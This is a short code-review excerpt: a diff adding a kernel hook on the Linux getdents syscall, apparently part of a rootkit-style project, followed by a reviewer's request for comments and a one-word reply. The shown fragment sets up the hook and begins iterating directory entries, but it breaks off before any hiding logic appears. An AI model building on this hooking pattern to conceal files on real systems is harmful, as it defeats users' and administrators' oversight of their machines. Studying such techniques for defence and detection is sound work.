hook_functions/getdents.c

```diff
@@ -0,0 +1,45 @@
+
+struct linux_dirent {
+           long           d_ino;
+           off_t          d_off;
+           unsigned short d_reclen;
+           char           d_name[];
+       };
+
+asmlinkage int (*original_getdents) (unsigned int fd, struct linux_dirent* dirp, unsigned int count);
+
+asmlinkage int sys_getdents_hook(unsigned int fd, struct linux_dirent* dirp, unsigned int count)
+{
+        int nread;
+        struct linux_dirent *d;
+        int bpos = 0;
+        int rem;
+        char file_name[256] = {0};
+        struct linux_dirent copied;
+        char* tempbuf;
+
+        nread = original_getdents(fd, dirp, count);
+
+        for (bpos = 0; bpos < nread;) {
```

Comment:
add comments to this code part, there are many magic numbers here (24, 256) and kind of complicated logic.

Reply:
done